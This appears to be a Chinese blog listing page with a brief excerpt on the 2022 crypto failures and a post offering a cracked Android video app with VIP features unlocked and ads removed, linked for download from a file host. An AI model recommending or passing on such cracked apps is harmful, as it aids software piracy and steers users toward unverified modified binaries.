们震惊地看着Terra、Three Arrows Capital和FTX像多米诺骨牌一样倒下,2022年也许不是加密货币最灾难性的一年,但至少配得上之一,你觉得呢?...

    2023-01-04 409
  • 安卓大师兄影视v3.0.0去广告VIP绿化版

    软件介绍 大师影视,安卓影视聚合应用,采集全网影视资源,跟大部分的影视应用稍有不同,大师兄影视主要采用自建高清源,片源存储国内服务器,所有视频无广告水印,支持蓝光1080P/倍速播放/TV投屏功能。 软件截图 版本特点 解锁VIP、去首页横幅广播 去分享标签,界面更加美观 去我的标签无用界面更简洁 禁止开机自启,去更新提示 下载链接:https://dufeng.lanzoum.com/iggwU0jyzbaf ...

    2023-01-03 487

联系我们

在线咨询:点击这里给我发消息

QQ交流群:KirinBlog

工作日:8:00-23:00,节假日休息

扫码关注